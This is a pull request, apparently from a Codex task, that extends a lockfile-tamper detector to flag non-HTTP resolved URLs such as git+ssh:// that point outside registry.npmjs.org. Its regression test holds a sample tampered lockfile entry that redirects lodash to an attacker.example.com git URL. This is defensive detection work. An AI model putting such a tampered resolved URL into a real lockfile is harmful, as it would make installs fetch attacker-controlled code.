### PR TITLE
fix(review): catch non-http lockfile resolved URLs

### DIFF
--- a/src/review/lockfile-tamper.ts
+++ b/src/review/lockfile-tamper.ts
@@ -20,12 +20,14 @@ import type { AdvisoryFinding, PullRequestFileRecord } from "../types";
 
 const NPM_REGISTRY_HOST_RE = /^https:\/\/registry\.npmjs\.org\//i;
 
-// Only a `resolved` value that IS an http(s) URL can be judged against the registry-host allowlist. An npm
+// Only a `resolved` value that IS a URL can be judged against the registry-host allowlist. An npm
 // workspace's own local packages (e.g. this repo's `packages/gittensory-mcp`, `apps/gittensory-ui` — see
 // `"link": true` entries in package-lock.json) have a `resolved` field that's a RELATIVE FILESYSTEM PATH, not a
 // URL at all (e.g. `"packages/gittensory-mcp"`). Such a value was never resolved FROM a registry, so it can't be
 // "off-registry" — it must be exempted rather than flagged just because it fails the npmjs.org prefix check.
-const HTTP_URL_RE = /^https?:\/\//i;
+// Remote npm lockfile entries are not limited to http(s): git+ssh://, git+https://, ssh://, and similar URL
+// schemes still fetch outside the npm registry and must stay visible to the supply-chain gate.
+const RESOLVED_URL_RE = /^[a-z][a-z0-9+.-]*:\/\//i;
 
 // Package-lock "packages" entries are keyed either `"node_modules/<pkg>"` (lockfileVersion 2/3) or a bare
 // `"<pkg>"` (lockfileVersion 1 "dependencies" tree, and yarn/pnpm equivalents keep a similar bare-name header).
@@ -77,7 +79,7 @@ type LockfileTamperCandidate = {
    *  somewhere in the diff (see versionChanged() below for the exact rule). */
   versionChanged: boolean;
   /** A `+resolved` URL seen for this package block that does not point at registry.npmjs.org, or null. Only
-   *  ever set for values that ARE http(s) URLs — see HTTP_URL_RE. */
+   *  ever set for values that ARE URLs — see RESOLVED_URL_RE. */
   offRegistryResolvedUrl: string | null;
 };
 
@@ -174,7 +176,7 @@ function scanPackageLockPatch(path: string, patch: string): LockfileTamperCandid
 
     const entry = entryFor(currentEntryKey, currentPackageName);
     entry.resolvedOrIntegrityChanged = true;
-    if (resolvedMatch && line.sign === "+" && resolvedMatch[1] && HTTP_URL_RE.test(resolvedMatch[1]) && !NPM_REGISTRY_HOST_RE.test(resolvedMatch[1])) {
+    if (resolvedMatch && line.sign === "+" && resolvedMatch[1] && RESOLVED_URL_RE.test(resolvedMatch[1]) && !NPM_REGISTRY_HOST_RE.test(resolvedMatch[1])) {
       entry.offRegistryResolvedUrl = resolvedMatch[1];
     }
   }

--- a/test/unit/lockfile-tamper.test.ts
+++ b/test/unit/lockfile-tamper.test.ts
@@ -113,6 +113,24 @@ describe("lockfileTamperRiskFinding", () => {
     expect(finding?.detail).toContain("outside registry.npmjs.org");
   });
 
+  it("flags a non-http remote resolved URL outside the npm registry, even with a version bump", () => {
+    const lockPatch = [
+      '@@ -100,8 +100,8 @@',
+      '     "node_modules/lodash": {',
+      '-      "version": "4.17.20",',
+      '-      "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.20.tgz",',
+      '-      "integrity": "sha512-oldoldold=="',
+      '+      "version": "4.17.21",',
+      '+      "resolved": "git+ssh://git@attacker.example.com/lodash.git#deadbeef",',
+      '+      "integrity": "sha512-newnewnew=="',
+      '     },',
+    ].join("\n");
+    const finding = lockfileTamperRiskFinding([lockfilePatch(lockPatch)]);
+    expect(finding).not.toBeNull();
+    expect(finding?.detail).toContain("lodash");
+    expect(finding?.detail).toContain("outside registry.npmjs.org");
+  });
+
   it("scans review-enrichment/package-lock.json and apps/gittensory-ui/package-lock.json the same way", () => {
     const lockPatch = [
       '@@ -1,4 +1,4 @@',


### PR DESCRIPTION
### Motivation
- Close a bypass in the lockfile tamper detector where non-HTTP URL schemes (e.g. `git+ssh://`, `ssh://`, `git+https://`) could evade the off-registry check when the entry's version also changed.

### Description
- Replace the narrow `http(s)` check with a broader URL-scheme matcher (`RESOLVED_URL_RE`) so any URL-shaped `resolved` value is compared against the `registry.npmjs.org` allowlist while preserving the workspace-relative path exemption. 
- Update comments and the candidate metadata to clarify the new URL rule. 
- Add a regression unit test that proves a `git+ssh://` `resolved` value is flagged even when the lockfile entry version is bumped.

### Testing
- Ran `npm test -- --run test/unit/lockfile-tamper.test.ts` and the targeted unit suite passed (25 tests passed). 
- Ran `tsc --noEmit` (typecheck) which succeeded. 
- Ran `git diff --check` which reported no issues. 
- Ran `npm run test:coverage` / full `npm run test:ci` which did not complete green in this environment: targeted tests passed but the global coverage/CI commands fail here due to repository-wide coverage thresholds and an unrelated stale UI env reference / transient actionlint DNS issues, and `npm audit --audit-level=moderate` returned a 403 from the npm audit endpoint.

------
[Codex Task](https://chatgpt.com/codex/cloud/tasks/task_e_6a488f9b4314832c83840f7bc72ec8f5)